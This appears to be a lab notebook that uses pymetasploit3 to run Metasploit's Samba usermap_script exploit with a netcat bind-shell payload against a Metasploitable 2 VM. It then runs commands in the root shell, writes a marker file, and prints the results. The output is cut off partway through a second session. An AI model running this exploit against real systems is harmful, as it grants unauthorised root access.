In [13]:
import time
from pymetasploit3.msfrpc import MsfRpcClient, MsfRpcError


In [14]:
def connect_to_metasploit(password: str, server: str = '127.0.0.1', port: int = 55553) -> MsfRpcClient:
    """
    Conecta con el servicio de Metasploit RPC utilizando pymetasploit3.

    Args:
        password (str): Contraseña utilizada en msfrpcd.
        server (str): Dirección IP donde corre msfrpcd. Por defecto, '127.0.0.1'.
        port (int): Puerto donde escucha msfrpcd. Por defecto, 55553.

    Returns:
        MsfRpcClient: Instancia conectada del cliente RPC de Metasploit.
    """
    try:
        client = MsfRpcClient(password=password, server=server, port=port)
        print("Conexión exitosa a Metasploit.")
        return client
    except (ConnectionError, TimeoutError) as e:
        print(f"Error de conexión: {e}")
        return None
    except (MsfRpcError, ValueError) as e:
        print(f"Error específico de Metasploit RPC: {e}")
        return None


In [15]:
def run_samba_exploit(client: MsfRpcClient, rhost: str, lport: int = 4444) -> None:
    """
    Ejecuta el exploit 'multi/samba/usermap_script' contra la máquina Metasploitable 2 
    y obtiene una shell con el payload cmd/unix/bind_netcat.
    """
    try:
        # 1. Configurar el exploit
        exploit = client.modules.use('exploit', 'multi/samba/usermap_script')
        exploit['RHOSTS'] = rhost
        exploit['RPORT'] = 139  # Ajusta si fuera 445 en tu caso

        # 2. Configurar el payload (bind shell con netcat)
        payload = client.modules.use('payload', 'cmd/unix/bind_netcat')
        payload['LPORT'] = lport  # Puerto por el que se vinculará la shell en la víctima

        print(f"[+] Exploit configurado para RHOSTS={rhost}, RPORT=139")
        print("[+] Payload configurado: cmd/unix/bind_netcat")

        # 3. Ejecutar el exploit
        print("[+] Ejecutando el exploit...")
        exploit.execute(payload=payload)

        # 4. Esperar un tiempo para que la sesión se inicie
        time.sleep(10)

        # 5. Verificar si hay sesiones activas
        sessions = client.sessions.list
        if sessions:
            print("[+] Explotación exitosa. Sesiones activas detectadas:")
            for session_id, session_info in sessions.items():
                print(f"    - Session ID: {session_id}, Info: {session_info}")
                session = client.sessions.session(session_id)

                # Comando: ¿Quién soy?
                session.write('whoami')
                time.sleep(1)
                whoami_output = session.read()
                print(f"\n[+] whoami:\n{whoami_output}")

                # Comando: Listar archivos
                session.write('ls')
                time.sleep(1)
                ls_output = session.read()
                print(f"[+] Archivos en el directorio actual:\n{ls_output}")

                # Comando: Mostrar el hostname
                session.write('hostname')
                time.sleep(1)
                hostname_output = session.read()
                print(f"[+] Nombre de la máquina:\n{hostname_output}")

                # Comando: Crear un archivo
                session.write('echo \"Hacked by pymetasploit3\" > /tmp/hacked_samba.txt')
                time.sleep(1)
                create_file_output = session.read()
                if create_file_output:
                    print(f"[+] Salida:\n{create_file_output}")
                print('[+] Archivo \"/tmp/hacked_samba.txt\" creado en la máquina víctima.')
        else:
            print("[-] No se ha podido abrir ninguna sesión. El exploit podría haber fallado.")
    except (ConnectionError, TimeoutError) as e:
        print(f"Error de conexión o timeout durante el exploit: {e}")
    except (MsfRpcError, ValueError) as e:
        print(f"Error específico de Metasploit al ejecutar el exploit: {e}")
        print(f"Error específico de Metasploit al ejecutar el exploit: {e}")


In [16]:
"""
  1) Conecta con Metasploit.
  2) Ejecuta el exploit de Samba contra Metasploitable 2.
"""
# 1. Conectar con Metasploit
client = connect_to_metasploit(password='password')  # Ajusta la contraseña según la configuración de msfrpcd

# 2. En caso de conexión exitosa, ejecutar el exploit
if client:
    target_ip = '10.0.2.4'  # Ajusta la 444IP según la de tu Metasploitable 2
    run_samba_exploit(client, target_ip)
else:
    print("No se puede proceder sin una conexión exitosa a Metasploit.")


Conexión exitosa a Metasploit.
[+] Exploit configurado para RHOSTS=10.0.2.4, RPORT=139
[+] Payload configurado: cmd/unix/bind_netcat
[+] Ejecutando el exploit...
[+] Explotación exitosa. Sesiones activas detectadas:
    - Session ID: 2, Info: {'type': 'shell', 'tunnel_local': '10.0.2.15:33583', 'tunnel_peer': '10.0.2.4:4444', 'via_exploit': 'exploit/multi/samba/usermap_script', 'via_payload': 'payload/cmd/unix/bind_netcat', 'desc': 'Command shell', 'info': '', 'workspace': '', 'session_host': '10.0.2.4', 'session_port': 139, 'target_host': '10.0.2.4', 'username': 'kali', 'uuid': 'mt0tcx7q', 'exploit_uuid': 'fkhx0els', 'routes': '', 'arch': 'cmd'}

[+] whoami:
root

[+] Archivos en el directorio actual:
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

[+] Nombre de la máquina:
metasploitable

[+] Archivo "/tmp/hacked_samba.txt" creado en la máquina víctima.
    - Session ID: 3, Info: {'type': 'shell', 'tunne